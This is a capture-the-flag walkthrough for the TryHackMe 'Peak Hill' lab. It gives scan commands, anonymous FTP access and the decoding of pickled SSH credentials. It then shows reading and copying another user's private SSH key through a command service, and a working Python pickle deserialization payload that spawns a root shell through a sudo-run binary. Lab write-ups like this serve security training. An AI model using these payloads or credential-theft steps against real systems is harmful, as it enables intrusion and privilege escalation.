Peak Hill

Room Link: https://tryhackme.com/room/peakhill

Scans

Initial scan

Kali

nmap -A $VICTIM

Longer scan

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/21 - FTP

Kali

ftp $VICTIM 21
username: anonymous

There was just one file with no info.

Kali(ftp)

ls -lah
binary
passive
get test.txt
get .creds

Decrypt Program

read.py

import pickle

with open("download.dat", "rb") as file:
	pickle_data = file.read()
	creds = pickle.loads(pickle_data)
	print(creds)

Kali

python read.py

output.txt

[('ssh_pass15', 'u'), ('ssh_user1', 'h'), ('ssh_pass25', 'r'), ('ssh_pass20', 'h'), ('ssh_pass7', '_'), ('ssh_user0', 'g'), ('ssh_pass26', 'l'), ('ssh_pass5', '3'), ('ssh_pass1', '1'), ('ssh_pass22', '_'), ('ssh_pass12', '@'), ('ssh_user2', 'e'), ('ssh_user5', 'i'), ('ssh_pass18', '_'), ('ssh_pass27', 'd'), ('ssh_pass3', 'k'), ('ssh_pass19', 't'), ('ssh_pass6', 's'), ('ssh_pass9', '1'), ('ssh_pass23', 'w'), ('ssh_pass21', '3'), ('ssh_pass4', 'l'), ('ssh_pass14', '0'), ('ssh_user6', 'n'), ('ssh_pass2', 'c'), ('ssh_pass13', 'r'), ('ssh_pass16', 'n'), ('ssh_pass8', '@'), ('ssh_pass17', 'd'), ('ssh_pass24', '0'), ('ssh_user3', 'r'), ('ssh_user4', 'k'), ('ssh_pass11', '_'), ('ssh_pass0', 'p'), ('ssh_pass10', '1')]

Kali

cat output.txt | sed "s/), (/)\n/g" | grep ssh_user

Username

gherkin

Kali

cat output.txt | sed "s/), (/)\n/g" | grep ssh_pass

Password

p1ckl3s_@11_@r0und_th3_w0rld

TCP/22 - SSH

Kali

ssh gherkin@$VICTIM
Password:p1ckl3s_@11_@r0und_th3_w0rld

There is a pyc file in the home directory. .pyc are automatically generated by the interpreter when you import a module, which speeds up future importing of that module. These files are therefore only created from a .py file if it is imported by another .py file or module. We can use the uncompyle6 (A native Python cross-version decompiler and fragment decompiler to get the original python file.

Victim

ls -lah
cat cmd_service.pyc

Transfer file then decompile it

Kali

scp gherkin@$VICTIM:/home/gherkin/cmd_service.pyc /root/
Password: p1ckl3s_@11_@r0und_th3_w0rld

Kali

sudo pip install uncompyle6
uncompyle6 cmd_service.pyc 

We can see some interesting things from the file. A username and password and something runnining on port 7321 which also came up on our scans.

Took a piece of the code to get the username and password.

output.py

from Crypto.Util.number import bytes_to_long, long_to_bytes
import sys, textwrap, socketserver, string, readline, threading
from time import *                 
import getpass, os, subprocess 

username = long_to_bytes(1684630636)
password = long_to_bytes(2457564920124666544827225107428488864802762356)

print(username)
print(password)

Kali

python output.py

TCP/7321 - Script

Kali

nc $VICTIM 7321
Username: dill
Password: n3v3r_@_d1ll_m0m3nt

Kali

Cmd: ls -lah /home/dill/.ssh
Cmd: cat /home/dill/.ssh/id_rsa
cat /home/dill/.ssh/id_rsa > /tmp/id_rsa

Kali

scp gherkin@$VICTIM:/tmp/id_rsa /root/
Password: p1ckl3s_@11_@r0und_th3_w0rld

Kali

chmod 600 id_rsa
ssh -i id_rsa dill@$VICTIM

Victim

sudo -l

Victim

sudo /opt/peak_hill_farm/peak_hill_farm
pickle

serial.py

import pickle
import os
import base64
class EvilPickle(object):
	def __reduce__(self):
		return (os.system, ('/bin/bash', ))
pickle_data = pickle.dumps(EvilPickle())
payload = base64.b64encode(pickle_data)
print (payload)

Kali

python serial.py 

Victim

sudo /opt/peak_hill_farm/peak_hill_farm
gANjcG9zaXgKc3lzdGVtCnEAWAkAAAAvYmluL2Jhc2hxAYVxAlJxAy4=